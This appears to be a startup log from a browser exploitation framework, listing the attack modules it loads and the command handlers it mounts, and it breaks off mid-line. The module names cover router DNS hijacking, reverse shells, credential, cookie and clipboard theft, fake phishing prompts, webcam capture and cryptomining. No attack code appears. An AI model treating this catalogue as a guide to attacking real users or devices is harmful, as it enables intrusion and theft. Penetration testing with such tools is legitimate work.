-[12:25:37][>] Soft Load module: 'telstra_zte_mf91_change_ssid' -[12:25:37][>] Soft Load module: 'telstra_zte_mf91_change_pw' -[12:25:37][>] Soft Load module: 'asus_rt_n12e_get_info' -[12:25:37][>] Soft Load module: 'linksys_wrt54g_csrf' -[12:25:37][>] Soft Load module: 'tenda_adsl_dns_hijack' -[12:25:37][>] Soft Load module: 'belkin_dns_csrf' -[12:25:37][>] Soft Load module: 'comtrend_ct5624_csrf' -[12:25:37][>] Soft Load module: 'dlink_dsl2640u_dns_hijack' -[12:25:37][>] Soft Load module: 'freenas_reverse_root_shell_csrf' -[12:25:37][>] Soft Load module: 'dlink_sharecenter_cmd_exec' -[12:25:37][>] Soft Load module: 'boastmachine_add_user_csrf' -[12:25:37][>] Soft Load module: 'zenoss_add_user_csrf' -[12:25:37][>] Soft Load module: 'hp_ucmdb_add_user_csrf' -[12:25:37][>] Soft Load module: 'glassfish_war_upload_xsrf' -[12:25:37][>] Soft Load module: 'ntfscommoncreate_dos' -[12:25:37][>] Soft Load module: 'shell_shock_scanner' -[12:25:37][>] Soft Load module: 'Wordpress_add_admin' -[12:25:37][>] Soft Load module: 'apache_cookies' -[12:25:37][>] Soft Load module: 'airlive_add_user_csrf' -[12:25:37][>] Soft Load module: 'linksys_wvc_wireless_camera_csrf' -[12:25:37][>] Soft Load module: 'Dlink_dcs_series_csrf' -[12:25:37][>] Soft Load module: 'firephp_code_exec' -[12:25:37][>] Soft Load module: 'Shell_shocked' -[12:25:37][>] Soft Load module: 'Netgear_gs108t_csrf' -[12:25:37][>] Soft Load module: 'Dlink_dgs_1100_device_reset_csrf' -[12:25:37][>] Soft Load module: 'Dlink_dgs_1100_fdb_whitelist_csrf' -[12:25:37][>] Soft Load module: 'Dlink_dgs_1100_port_mirroring_csrf' -[12:25:37][>] Soft Load module: 'groovyshell_server_command_execution' -[12:25:37][>] Soft Load module: 'jboss_jmx_upload_exploit' -[12:25:37][>] Soft Load module: 'skype_xss' -[12:25:37][>] Soft Load module: 'serendipity_1_6_xss' -[12:25:37][>] Soft Load module: 'sqlitemanager_xss' -[12:25:37][>] Soft Load module: 'cisco_collaboration_server_5_xss' -[12:25:37][>] Soft Load module: 'alienvault_ossim_3_1_xss' -[12:25:37][>] Soft Load module: 'extract_cmd_exec' -[12:25:37][>] Soft Load module: 'monowall_reverse_root_shell_csrf' -[12:25:37][>] Soft Load module: 'BeEF_bind_shell' -[12:25:37][>] Soft Load module: 'Eudora_mail_beef_bind' -[12:25:37][>] Soft Load module: 'Active_fax_beef_bind' -[12:25:37][>] Soft Load module: 'zeroshell_2_0rc2_admin_password' -[12:25:37][>] Soft Load module: 'zeroshell_2_0rc2_reverse_shell_csrf_sop_bypass' -[12:25:37][>] Soft Load module: 'zeroshell_2_0rc2_migrate_hook' -[12:25:37][>] Soft Load module: 'zeroshell_2_0rc2_file_disclosure' -[12:25:37][>] Soft Load module: 'zeroshell_2_0rc2_admin_static_token' -[12:25:37][>] Soft Load module: 'zeroshell_2_0rc2_scanner' -[12:25:37][>] Soft Load module: 'zeroshell_2_0rc2_admin_dynamic_token' -[12:25:37][>] Soft Load module: 'zeroshell_2_0rc2_reverse_shell_csrf_sop' -[12:25:37][>] Soft Load module: 'jenkins_groovy_code_exec' -[12:25:37][>] Soft Load module: 'zenoss_command_execution' -[12:25:37][>] Soft Load module: 'activex_command_execution' -[12:25:37][>] Soft Load module: 'ie_ms12_004_midi' -[12:25:37][>] Soft Load module: 'windows_mail_client_dos' -[12:25:37][>] Soft Load module: 'java_payload' -[12:25:37][>] Soft Load module: 'signed_applet_dropper' -[12:25:37][>] Soft Load module: 'ie_ms13_069_caret' -[12:25:37][>] Soft Load module: 'safari_launch_app' -[12:25:37][>] Soft Load module: 'ruby_nntpd_cmd_exec' -[12:25:37][>] Soft Load module: 'farsite_X25_remote_shell' -[12:25:37][>] Soft Load module: 'php_dos' -[12:25:37][>] Soft Load module: 'rfi_scanner' -[12:25:37][>] Soft Load module: 'resource_exhaustion_dos' -[12:25:37][>] Soft Load module: 'phonegap_check_connection' -[12:25:37][>] Soft Load module: 'phonegap_list_files' -[12:25:37][>] Soft Load module: 'phonegap_start_record_audio' -[12:25:37][>] Soft Load module: 'phonegap_file_upload' -[12:25:37][>] Soft Load module: 'phonegap_prompt_user' -[12:25:37][>] Soft Load module: 'phonegap_persist_resume' -[12:25:37][>] Soft Load module: 'phonegap_globalization_status' -[12:25:37][>] Soft Load module: 'phonegap_keychain' -[12:25:37][>] Soft Load module: 'phonegap_list_contacts' -[12:25:37][>] Soft Load module: 'phonegap_persistence' -[12:25:37][>] Soft Load module: 'phonegap_alert_user' -[12:25:37][>] Soft Load module: 'phonegap_geo_locate' -[12:25:37][>] Soft Load module: 'phonegap_plugin_detection' -[12:25:37][>] Soft Load module: 'phonegap_detect' -[12:25:37][>] Soft Load module: 'phonegap_stop_record_audio' -[12:25:37][>] Soft Load module: 'phonegap_beep' -[12:25:37][>] Soft Load module: 'steal_autocomplete' -[12:25:37][>] Soft Load module: 'text_to_voice' -[12:25:37][>] Soft Load module: 'pretty_theft' -[12:25:37][>] Soft Load module: 'gmail_phishing' -[12:25:37][>] Soft Load module: 'ui_abuse_ie' -[12:25:37][>] Soft Load module: 'fake_lastpass' -[12:25:37][>] Soft Load module: 'tabnabbing' -[12:25:37][>] Soft Load module: 'sitekiosk_breakout' -[12:25:37][>] Soft Load module: 'fake_notification_ie' -[12:25:37][>] Soft Load module: 'replace_video_fake_plugin' -[12:25:37][>] Soft Load module: 'fake_notification' -[12:25:37][>] Soft Load module: 'clippy' -[12:25:37][>] Soft Load module: 'fake_evernote_clipper' -[12:25:37][>] Soft Load module: 'firefox_extension_reverse_shell' -[12:25:37][>] Soft Load module: 'simple_hijacker' -[12:25:37][>] Soft Load module: 'hta_powershell' -[12:25:37][>] Soft Load module: 'clickjacking' -[12:25:37][>] Soft Load module: 'spoof_addressbar_data' -[12:25:37][>] Soft Load module: 'fake_notification_c' -[12:25:37][>] Soft Load module: 'lcamtuf_download' -[12:25:37][>] Soft Load module: 'edge_wscript_wsh_injection' -[12:25:37][>] Soft Load module: 'firefox_extension_dropper' -[12:25:37][>] Soft Load module: 'firefox_extension_bindshell' -[12:25:37][>] Soft Load module: 'fake_notification_ff' -[12:25:37][>] Soft Load module: 'fake_flash_update' -[12:25:37][>] Soft Load module: 'cross_site_printing' -[12:25:37][>] Soft Load module: 'cross_site_faxing' -[12:25:37][>] Soft Load module: 'inter_protocol_win_bindshell' -[12:25:37][>] Soft Load module: 'etag_client' -[12:25:37][>] Soft Load module: 's2c_dns_tunnel' -[12:25:37][>] Soft Load module: 'inter_protocol_imap' -[12:25:37][>] Soft Load module: 'inter_protocol_redis' -[12:25:37][>] Soft Load module: 'inter_protocol_posix_bindshell' -[12:25:37][>] Soft Load module: 'inter_protocol_irc' -[12:25:37][>] Soft Load module: 'send_inotes' -[12:25:37][>] Soft Load module: 'extract_inotes_list' -[12:25:37][>] Soft Load module: 'send_inotes_with_attachment' -[12:25:37][>] Soft Load module: 'read_inotes' -[12:25:37][>] Soft Load module: 'inotes_flooder' -[12:25:37][>] Soft Load module: 'read_gmail' -[12:25:37][>] Soft Load module: 'invisible_iframe' -[12:25:37][>] Soft Load module: 'local_file_theft' -[12:25:37][>] Soft Load module: 'iframe_keylogger' -[12:25:37][>] Soft Load module: 'wordpress_current_user_info' -[12:25:37][>] Soft Load module: 'wordpress_add_user' -[12:25:37][>] Soft Load module: 'wordpress_upload_rce_plugin' -[12:25:37][>] Soft Load module: 'wordpress_post_auth_rce' -[12:25:37][>] Soft Load module: 'unblockui' -[12:25:37][>] Soft Load module: 'iframe_sniffer' -[12:25:37][>] Soft Load module: 'raw_javascript' -[12:25:37][>] Soft Load module: 'blockui' -[12:25:37][>] Soft Load module: 'no_sleep' -[12:25:37][>] Soft Load module: 'cryptoloot_miner' -[12:25:37][>] Soft Load module: 'track_physical_movement' -[12:25:37][>] Soft Load module: 'detect_airdroid' -[12:25:37][>] Soft Load module: 'get_registry_keys' -[12:25:37][>] Soft Load module: 'iphone_tel' -[12:25:37][>] Soft Load module: 'detect_protocol_handlers' -[12:25:37][>] Soft Load module: 'physical_location_thirdparty' -[12:25:37][>] Soft Load module: 'detect_coupon_printer' -[12:25:37][>] Soft Load module: 'hook_microsoft_edge' -[12:25:37][>] Soft Load module: 'detect_hp' -[12:25:37][>] Soft Load module: 'detect_local_drives' -[12:25:37][>] Soft Load module: 'get_battery_status' -[12:25:37][>] Soft Load module: 'detect_cups' -[12:25:37][>] Soft Load module: 'get_system_info_java' -[12:25:37][>] Soft Load module: 'get_internal_ip_java' -[12:25:37][>] Soft Load module: 'detect_antivirus' -[12:25:37][>] Soft Load module: 'clipboard_theft' -[12:25:37][>] Soft Load module: 'physical_location' -[12:25:37][>] Soft Load module: 'detect_google_desktop' -[12:25:37][>] Soft Load module: 'detect_default_browser' -[12:25:37][>] Soft Load module: 'get_internal_ip_webrtc' -[12:25:37][>] Soft Load module: 'get_connection_type' -[12:25:37][>] Soft Load module: 'detect_users' -[12:25:37][>] Soft Load module: 'detect_software' -[12:25:37][>] Soft Load module: 'get_wireless_keys' -[12:25:37][>] Soft Load module: 'hook_default_browser' -[12:25:37][>] Soft Load module: 'popunder_window' -[12:25:37][>] Soft Load module: 'popunder_window_ie' -[12:25:37][>] Soft Load module: 'iframe_above' -[12:25:37][>] Soft Load module: 'hijack_opener' -[12:25:37][>] Soft Load module: 'invisible_htmlfile_activex' -[12:25:37][>] Soft Load module: 'confirm_close_tab' -[12:25:37][>] Soft Load module: 'man_in_the_browser' -[12:25:37][>] Soft Load module: 'jsonp_service_worker' -[12:25:37][>] Soft Load module: 'send_gvoice_sms' -[12:25:37][>] Soft Load module: 'get_all_cookies' -[12:25:37][>] Soft Load module: 'execute_tabs' -[12:25:37][>] Soft Load module: 'grab_google_contacts' -[12:25:37][>] Soft Load module: 'inject_beef' -[12:25:37][>] Soft Load module: 'screenshot' -[12:25:37][>] Server: mounted handler '/command/internal_network_fingerprinting.js' -[12:25:37][>] Hard Load module: 'internal_network_fingerprinting' -[12:25:37][>] Server: mounted handler '/command/detect_burp.js' -[12:25:37][>] Hard Load module: 'detect_burp' -[12:25:37][>] Server: mounted handler '/command/get_http_servers.js' -[12:25:37][>] Hard Load module: 'get_http_servers' -[12:25:37][>] Server: mounted handler '/command/detect_tor.js' -[12:25:37][>] Hard Load module: 'detect_tor' -[12:25:37][>] Server: mounted handler '/command/irc_nat_pinning.js' -[12:25:37][>] Hard Load module: 'irc_nat_pinning' -[12:25:37][>] Server: mounted handler '/command/get_ntop_network_hosts.js' -[12:25:37][>] Hard Load module: 'get_ntop_network_hosts' -[12:25:37][>] Server: mounted handler '/command/doser.js' -[12:25:37][>] Hard Load module: 'doser' -[12:25:37][>] Server: mounted handler '/command/detect_soc_nets.js' -[12:25:37][>] Hard Load module: 'detect_soc_nets' -[12:25:37][>] Server: mounted handler '/command/ping_sweep_ff.js' -[12:25:37][>] Hard Load module: 'ping_sweep_ff' -[12:25:37][>] Server: mounted handler '/command/cross_origin_scanner_cors.js' -[12:25:37][>] Hard Load module: 'cross_origin_scanner_cors' -[12:25:37][>] Server: mounted handler '/command/dns_enumeration.js' -[12:25:37][>] Hard Load module: 'dns_enumeration' -[12:25:37][>] Server: mounted handler '/command/cross_origin_scanner_flash.js' -[12:25:37][>] Hard Load module: 'cross_origin_scanner_flash' -[12:25:37][>] Server: mounted handler '/command/get_proxy_servers_wpad.js' -[12:25:37][>] Hard Load module: 'get_proxy_servers_wpad' -[12:25:37][>] Server: mounted handler '/command/port_scanner.js' -[12:25:37][>] Hard Load module: 'port_scanner' -[12:25:37][>] Server: mounted handler '/command/fingerprint_routers.js' -[12:25:37][>] Hard Load module: 'fingerprint_routers' -[12:25:37][>] Server: mounted handler '/command/ping_sweep.js' -[12:25:37][>] Hard Load module: 'ping_sweep' -[12:25:37][>] Server: mounted handler '/command/f5_bigip_cookie_stealing.js' -[12:25:37][>] Hard Load module: 'f5_bigip_cookie_stealing' -[12:25:37][>] Server: mounted handler '/command/f5_bigip_cookie_disclosure.js' -[12:25:37][>] Hard Load module: 'f5_bigip_cookie_disclosure' -[12:25:37][>] Server: mounted handler '/command/sw_port_scanner.js' -[12:25:37][>] Hard Load module: 'sw_port_scanner' -[12:25:37][>] Server: mounted handler '/command/ping_sweep_java.js' -[12:25:37][>] Hard Load module: 'ping_sweep_java' -[12:25:37][>] Server: mounted handler '/command/identify_lan_subnets.js' -[12:25:37][>] Hard Load module: 'identify_lan_subnets' -[12:25:37][>] Server: mounted handler '/command/dns_rebinding.js' -[12:25:37][>] Hard Load module: 'dns_rebinding' -[12:25:37][>] Server: mounted handler '/command/test_return_image.js' -[12:25:37][>] Hard Load module: 'test_return_image' -[12:25:37][>] Server: mounted handler '/command/test_network_request.js' -[12:25:37][>] Hard Load module: 'test_network_request' -[12:25:37][>] Server: mounted handler '/command/test_http_redirect.js' -[12:25:37][>] Hard Load module: 'test_http_redirect' -[12:25:37][>] Server: mounted handler '/command/test_return_ascii_chars.js' -[12:25:37][>] Hard Load module: 'test_return_ascii_chars' -[12:25:37][>] Server: mounted handler '/command/test_dns_tunnel_client.js' -[12:25:37][>] Hard Load module: 'test_dns_tunnel_client' -[12:25:37][>] Server: mounted handler '/command/test_beef_debug.js' -[12:25:37][>] Hard Load module: 'test_beef_debug' -[12:25:37][>] Server: mounted handler '/command/test_get_variable.js' -[12:25:37][>] Hard Load module: 'test_get_variable' -[12:25:37][>] Server: mounted handler '/command/test_return_long_string.js' -[12:25:37][>] Hard Load module: 'test_return_long_string' -[12:25:37][>] Server: mounted handler '/command/test_cors_request.js' -[12:25:37][>] Hard Load module: 'test_cors_request' -[12:25:37][>] Server: mounted handler '/command/Detect_unity.js' -[12:25:37][>] Hard Load module: 'Detect_unity' -[12:25:37][>] Server: mounted handler '/command/detect_office.js' -[12:25:37][>] Hard Load module: 'detect_office' -[12:25:37][>] Server: mounted handler '/command/unhook.js' -[12:25:37][>] Hard Load module: 'unhook' -[12:25:37][>] Server: mounted handler '/command/avant_steal_history.js' -[12:25:37][>] Hard Load module: 'avant_steal_history' -[12:25:37][>] Server: mounted handler '/command/detect_wmp.js' -[12:25:37][>] Hard Load module: 'detect_wmp' -[12:25:37][>] Server: mounted handler '/command/detect_vlc.js' -[12:25:37][>] Hard Load module: 'detect_vlc' -[12:25:37][>] Server: mounted handler '/command/browser_fingerprinting.js' -[12:25:37][>] Hard Load module: 'browser_fingerprinting' -[12:25:37][>] Server: mounted handler '/command/webcam.js' -[12:25:37][>] Hard Load module: 'webcam' -[12:25:37][>] Server: mounted handler '/command/get_visited_domains.js' -[12:25:37][>] Hard Load module: 'get_visited_domains' -[12:25:37][>] Server: mounted handler '/command/detect_foxit.js' -[12:25:37][>] Hard Load module: 'detect_foxit' -[12:25:37][>] Server: mounted handler '/command/Detect_toolbars.js' -[12:25:37][>] Hard Load module: 'Detect_toolbars' -[12:25:37][>] Server: mounted handler '/command/detect_realplayer.js' -[12:25:37][>] Hard Load module: 'detect_realplayer' -[12:25:37][>] Server: mounted handler '/command/detect_quicktime.js' -[12:25:37][>] Hard Load module: 'detect_quicktime' -[12:25:37][>] Server: mounted handler '/command/get_visited_urls.js' -[12:25:37][>] Hard Load module: 'get_visited_urls' -[12:25:37][>] Server: mounted handler '/command/fingerprint_browser.js' -[12:25:37][>] Hard Load module: 'fingerprint_browser' -[12:25:37][>] Server: mounted handler '/command/remove_hook_element.js' -[12:25:37][>] Hard Load module: 'remove_hook_element' -[12:25:37][>] Server: mounted handler '/command/detect_lastpass.js' -[12:25:37][>] Hard Load module: 'detect_lastpass' -[12:25:37][>] Server: mounted handler '/command/detect_simple_adblock.js' -[12:25:37][>] Hard Load module: 'detect_simple_adblock' -[12:25:37][>] Server: mounted handler '/command/webcam_html5.js' -[12:25:37][>] Hard Load module: 'webcam_html5' -[12:25:37][>] Server: mounted handler '/command/get_page_html_iframe.js' -[12:25:37][>] Hard Load module: 'get_page_html_iframe' -[12:25:37][>] Server: mounted handler '/command/link_rewrite_sslstrip.js' -[12:25:37][>] Hard Load module: 'link_rewrite_sslstrip' -[12:25:37][>] Server: mounted handler '/command/rickroll.js' -[12:25:37][>] Hard Load module: 'rickroll' -[12:25:37][>] Server: mounted handler '/command/link_rewrite_click_events.js' -[12:25:37][>] Hard Load module: 'link_rewrite_click_events' -[12:25:37][>] Server: mounted handler '/command/prompt_dialog.js' -[12:25:37][>] Hard Load module: 'prompt_dialog' -[12:25:37][>] Server: mounted handler '/command/get_form_values.js' -[12:25:37][>] Hard Load module: 'get_form_values' -[12:25:37][>] Server: mounted handler '/command/ajax_fingerprint.js' -[12:25:37][>] Hard Load module: 'ajax_fingerprint' -[12:25:37][>] Server: mounted handler '/command/deface_web_page_component.js' -[12:25:37][>] Hard Load module: 'deface_web_page_component' -[12:25:37][>] Server: mounted handler '/command/mobilesafari_address_spoofing.js' -[12:25:37][>] Hard Load module: 'mobilesafari_address_spoofing' -[12:25:37][>] Server: mounted handler '/command/deface_web_page.js' -[12:25:37][>] Hard Load module: 'deface_web_page' -[12:25:37][>] Server: mounted handler '/command/link_rewrite.js' -[12:25:37][>] Hard Load module: 'link_rewrite' -[12:25:37][>] Server: mounted handler '/command/get_stored_credentials.js' -[12:25:37][>] Hard Load module: 'get_stored_credentials' -[12:25:37][>] Server: mounted handler '/command/link_rewrite_tel.js' -[12:25:37][>] Hard Load module: 'link_rewrite_tel' -[12:25:37][>] Server: mounted handler '/command/remove_stuck_iframes.js' -[12:25:37][>] Hard Load module: 'remove_stuck_iframes' -[12:25:37][>] Server: mounted handler '/command/get_cookie.js' -[12:25:37][>] Hard Load module: 'get_cookie' -[12:25:37][>] Server: mounted handler '/command/clear_console.js' -[12:25:37][>] Hard Load module: 'clear_console' -[12:25:37][>] Server: mounted handler '/command/alert_dialog.js' -[12:25:37][>] Hard Load module: 'alert_dialog' -[12:25:37][>] Server: mounted handler '/command/site_redirect.js' -[12:25:37][>] Hard Load module: 'site_redirect' -[12:25:37][>] Server: mounted handler '/command/site_redirect_iframe.js' -[12:25:37][>] Hard Load module: 'site_redirect_iframe' -[12:25:37][>] Server: mounted handler '/command/get_local_storage.js' -[12:25:37][>] Hard Load module: 'get_local_storage' -[12:25:37][>] Server: mounted handler '/command/replace_video.js' -[12:25:37][>] Hard Load module: 'replace_video' -[12:25:37][>] Server: mounted handler '/command/overflow_cookiejar.js' -[12:25:37][>] Hard Load module: 'overflow_cookiejar' -[12:25:37][>] Server: mounted handler '/command/get_page_html.js' -[12:25:37][>] Hard Load module: 'get_page_html' -[12:25:37][>] Server: mounted handler '/command/get_page_links.js' -[12:25:37][>] Hard Load module: 'get_page_links' -[12:25:37][>] Server: mounted handler '/command/get_session_storage.js' -[12:25:37][>] Hard Load module: 'get_session_storage' -[12:25:37][>] Server: mounted handler '/command/disable_developer_tools.js' -[12:25:37][>] Hard Load module: 'disable_developer_tools' -[12:25:37][>] Server: mounted handler '/command/detect_silverlight.js' -[12:25:37][>] Hard Load module: 'detect_silverlight' -[12:25:37][>] Server: mounted handler '/command/detect_mime_types.js' -[12:25:37][>] Hard Load module: 'detect_mime_types' -[12:25:37][>] Server: mounted handler '/command/webcam_permission_check.js' -[12:25:37][>] Hard Load module: 'webcam_permission_check' -[12:25:37][>] Server: mounted handler '/command/detect_extensions.js' -[12:25:37][>] Hard Load module: 'detect_extensions' -[12:25:37][>] Server: mounted handler '/command/detect_unsafe_activex.js' -[12:25:37][>] Hard Load module: 'detect_unsafe_activex' -[12:25:37][>] Server: mounted handler '/command/detect_activex.js' -[12:25:37][>] Hard Load module: 'detect_activex' -[12:25:37][>] Server: mounted handler '/command/spyder_eye.js' -[12:25:37][>] Hard Load module: 'spyder_eye' -[12:25:37][>] Server: mounted handler '/command/Play_sound.js' -[12:25:37][>] Hard Load module: 'Play_sound' -[12:25:37][>] Server: mounted handler '/command/detect_popup_blocker.js' -[12:25:37][>] Hard Load module: 'detect_popup_blocker' -[12:25:37][>] Server: mounted handler '/command/detect_evernote_clipper.js' -[12:25:37][>] Hard Load module: 'detect_evernote_clipper' -[12:25:37][>] Server: mounted handler '/command/detect_firebug.js' -[12:25:37][>] Hard Load module: 'detect_firebug' -[12:25:37][>] Server: mounted handler '/command/vtiger_crm_upload_exploit.js' -[12:25:37][>] Hard Load module: 'vtiger_crm_upload_exploit' -[12:25:37][>] Server: mounted handler '/command/coldfusion_dir_traversal_exploit.js' -[12:25:37][>] Hard Load module: 'coldfusion_dir_traversal_exploit' -[12:25:37][>] Server: mounted handler '/command/pfsense_2_3_2_reverse_root_shell_csrf.js' -[12:25:37][>] Hard Load module: 'pfsense_2_3_2_reverse_root_shell_csrf' -[12:25:37][>] Server: mounted handler '/command/pfsense_reverse_root_shell_csrf.js' -[12:25:37][>] Hard Load module: 'pfsense_reverse_root_shell_csrf' -[12:25:37][>] Server: mounted handler '/command/qnx_qconn_command_execution.js' -[12:25:37][>] Hard Load module: 'qnx_qconn_command_execution' -[12:25:37][>] Server: mounted handler '/command/wanem_command_execution.js' -[12:25:37][>] Hard Load module: 'wanem_command_execution' -[12:25:37][>] Server: mounted handler '/command/kemp_command_execution.js' -[12:25:37][>] Hard Load module: 'kemp_command_execution' -[12:25:37][>] Server: mounted handler '/command/apache_felix_remote_shell.js' -[12:25:37][>] Hard Load module: 'apache_felix_remote_shell' -[12:25:37][>] Server: mounted handler '/command/opencart_reset_password.js' -[12:25:37][>] Hard Load module: 'opencart_reset_password' -[12:25:37][>] Server: mounted handler '/command/spring_framework_malicious_jar.js' -[12:25:37][>] Hard Load module: 'spring_framework_malicious_jar' -[12:25:37][>] Server: mounted handler '/command/wipg1000_cmd_injection.js' -[12:25:37][>] Hard Load module: 'wipg1000_cmd_injection' -[12:25:37][>] Server: mounted handler '/command/planet_vdr300nu_adsl_dns_hijack.js' -[12:25:37][>] Hard Load module: 'planet_vdr300nu_adsl_dns_hijack' -[12:25:37][>] Server: mounted handler '/command/utstarcom_wa3002g4_dns_hijack.js' -[12:25:37][>] Hard Load module: 'utstarcom_wa3002g4_dns_hijack' -[12:25:37][>] Server: mounted handler '/command/linksys_befsr41_csrf.js' -[12:25:37][>] Hard Load module: 'linksys_befsr41_csrf' -[12:25:37][>] Server: mounted handler '/command/Huawei_smartax_mt880_csrf.js' -[12:25:37][>] Hard Load module: 'Huawei_smartax_mt880_csrf' -[12:25:37][>] Server: mounted handler '/command/dlink_dsl2740r_dns_hijack.js' -[12:25:37][>] Hard Load module: 'dlink_dsl2740r_dns_hijack' -[12:25:37][>] Server: mounted handler '/command/telstra_zte_mf91_disable_ap_isolation.js' -[12:25:37][>] Hard Load module: 'telstra_zte_mf91_disable_ap_isolation' -[12:25:37][>] Server: mounted handler '/command/dlink_dir_615_csrf.js' -[12:25:37][>] Hard Load module: 'dlink_dir_615_csrf' -[12:25:37][>] Server: mounted handler '/command/exper_ewm01_adsl_dns_hijack.js' -[12:25:37][>] Hard Load module: 'exper_ewm01_adsl_dns_hijack' -[12:25:37][>] Server: mounted handler '/command/comtrend_ct_series_dns_hijack.js' -[12:25:37][>] Hard Load module: 'comtrend_ct_series_dns_hijack' -[12:25:37][>] Server: mounted handler '/command/ddwrt_v24_sp1_cmd_exec.js' -[12:25:37][>] Hard Load module: 'ddwrt_v24_sp1_cmd_exec' -[12:25:37][>] Server: mounted handler '/command/dlink_2640b_dns_hijack.js' -[12:25:37][>] Hard Load module: 'dlink_2640b_dns_hijack' -[12:25:37][>] Server: mounted handler '/command/dlink_dsl526b_dns_hijack.js' -[12:25:37][>] Hard Load module: 'dlink_dsl526b_dns_hijack' -[12:25:37][>] Server: mounted handler '/command/dlink_dsl500t_csrf.js' -[12:25:37][>] Hard Load module: 'dlink_dsl500t_csrf' -[12:25:37][>] Server: mounted handler '/command/asus_dslx11_dns_hijack.js' -[12:25:37][>] Hard Load module: 'asus_dslx11_dns_hijack' -[12:25:37][>] Server: mounted handler '/command/shuttle_tech_915wm_dns_hijack.js' -[12:25:37][>] Hard Load module: 'shuttle_tech_915wm_dns_hijack' -[12:25:37][>] Server: mounted handler '/command/philips_dns_hijack.js' -[12:25:37][>] Hard Load module: 'philips_dns_hijack' -[12:25:37][>] Server: mounted handler '/command/cisco_e2400_csrf.js' -[12:25:37][>] Hard Load module: 'cisco_e2400_csrf' -[12:25:37][>] Server: mounted handler '/command/comtrend_ct5367_csrf.js' -[12:25:37][>] Hard Load module: 'comtrend_ct5367_csrf' -[12:25:37][>] Server: mounted handler '/command/argw4_adsl_dns_hijack.js' -[12:25:37][>] Hard Load module: 'argw4_adsl_dns_hijack' -[12:25:37][>] Server: mounted handler '/command/pikatel_96338_dns_hijack.js' -[12:25:37][>] Hard Load module: 'pikatel_96338_dns_hijack' -[12:25:37][>] Server: mounted handler '/command/iball_baton_ib_wra150n_dns_hijack.js' -[12:25:37][>] Hard Load module: 'iball_baton_ib_wra150n_dns_hijack' -[12:25:37][>] Server: mounted handler '/command/dlink_dsl2780b_dns_hijack.js' -[12:25:37][>] Hard Load module: 'dlink_dsl2780b_dns_hijack' -[12:25:37][>] Server: mounted handler '/command/inteno_eg101r1_voip_dns_hijack.js' -[12:25:37][>] Hard Load module: 'inteno_eg101r1_voip_dns_hijack' -[12:25:37][>] Server: mounted handler '/command/linksys_e2500_csrf.js' -[12:25:37][>] Hard Load module: 'linksys_e2500_csrf' -[12:25:37][>] Server: mounted handler '/command/actiontec_q1000_csrf.js' -[12:25:37][>] Hard Load module: 'actiontec_q1000_csrf' -[12:25:37][>] Server: mounted handler '/command/com_officeconnect_cmd_exec.js' -[12:25:37][>] Hard Load module: 'com_officeconnect_cmd_exec' -[12:25:37][>] Server: mounted handler '/command/linksys_e2500_dns_hijack.js' -[12:25:37][>] Hard Load module: 'linksys_e2500_dns_hijack' -[12:25:37][>] Server: mounted handler '/command/asmax_ar804gu_cmd_exec.js' -[12:25:37][>] Hard Load module: 'asmax_ar804gu_cmd_exec' -[12:25:37][>] Server: mounted handler '/command/virgin_superhub_csrf.js' -[12:25:37][>] Hard Load module: 'virgin_superhub_csrf' -[12:25:37][>] Server: mounted handler '/command/bt_home_hub_csrf.js' -[12:25:37][>] Hard Load module: 'bt_home_hub_csrf' -[12:25:37][>] Server: mounted handler '/command/linksys_e2500_shell.js' -[12:25:37][>] Hard Load module: 'linksys_e2500_shell' -[12:25:37][>] Server: mounted handler '/command/beetel_bcm96338_router_dns_hijack.js' -[12:25:37][>] Hard Load module: 'beetel_bcm96338_router_dns_hijack' -[12:25:37][>] Server: mounted handler '/command/Netgear_dgn_2000_wan_mgmt_csrf.js' -[12:25:37][>] Hard Load module: 'Netgear_dgn_2000_wan_mgmt_csrf' -[12:25:37][>] Server: mounted handler '/command/netgear_dgn2200_cmd_exec.js' -[12:25:37][>] Hard Load module: 'netgear_dgn2200_cmd_exec' -[12:25:37][>] Server: mounted handler '/command/tplink_dns_csrf.js' -[12:25:37][>] Hard Load module: 'tplink_dns_csrf' -[12:25:37][>] Server: mounted handler '/command/asus_rt_n66u_cmd_exec.js' -[12:25:37][>] Hard Load module: 'asus_rt_n66u_cmd_exec' -[12:25:37][>] Server: mounted handler '/command/ddwrt_v24_sp1_csrf.js' -[12:25:37][>] Hard Load module: 'ddwrt_v24_sp1_csrf' -[12:25:37][>] Server: mounted handler '/command/linksys_wrt54g2_csrf.js' -[12:25:37][>] Hard Load module: 'linksys_wrt54g2_csrf' -[12:25:37][>] Server: mounted handler '/command/telstra_zte_mf91_change_ssid.js' -[12:25:37][>] Hard Load module: 'telstra_zte_mf91_change_ssid' -[12:25:37][>] Server: mounted handler '/command/telstra_zte_mf91_change_pw.js' -[12:25:37][>] Hard Load module: 'telstra_zte_mf91_change_pw' -[12:25:37][>] Server: mounted handler '/command/asus_rt_n12e_get_info.js' -[12:25:37][>] Hard Load module: 'asus_rt_n12e_get_info' -[12:25:37][>] Server: mounted handler '/command/linksys_wrt54g_csrf.js' -[12:25:37][>] Hard Load module: 'linksys_wrt54g_csrf' -[12:25:37][>] Server: mounted handler '/command/tenda_adsl_dns_hijack.js' -[12:25:37][>] Hard Load module: 'tenda_adsl_dns_hijack' -[12:25:37][>] Server: mounted handler '/command/belkin_dns_csrf.js' -[12:25:37][>] Hard Load module: 'belkin_dns_csrf' -[12:25:37][>] Server: mounted handler '/command/comtrend_ct5624_csrf.js' -[12:25:37][>] Hard Load module: 'comtrend_ct5624_csrf' -[12:25:37][>] Server: mounted handler '/command/dlink_dsl2640u_dns_hijack.js' -[12:25:37][>] Hard Load module: 'dlink_dsl2640u_dns_hijack' -[12:25:37][>] Server: mounted handler '/command/freenas_reverse_root_shell_csrf.js' -[12:25:37][>] Hard Load module: 'freenas_reverse_root_shell_csrf' -[12:25:37][>] Server: mounted handler '/command/dlink_sharecenter_cmd_exec.js' -[12:25:37][>] Hard Load module: 'dlink_sharecenter_cmd_exec' -[12:25:37][>] Server: mounted handler '/command/boastmachine_add_user_csrf.js' -[12:25:37][>] Hard Load module: 'boastmachine_add_user_csrf' -[12:25:37][>] Server: mounted handler '/command/zenoss_add_user_csrf.js' -[12:25:37][>] Hard Load module: 'zenoss_add_user_csrf' -[12:25:37][>] Server: mounted handler '/command/hp_ucmdb_add_user_csrf.js' -[12:25:37][>] Hard Load module: 'hp_ucmdb_add_user_csrf' -[12:25:37][>] Server: mounted handler '/command/glassfish_war_upload_xsrf.js' -[12:25:37][>] Hard Load module: 'glassfish_war_upload_xsrf' -[12:25:37][>] Server: mounted handler '/command/ntfscommoncreate_dos.js' -[12:25:37][>] Hard Load module: 'ntfscommoncreate_dos' -[12:25:37][>] Server: mounted handler 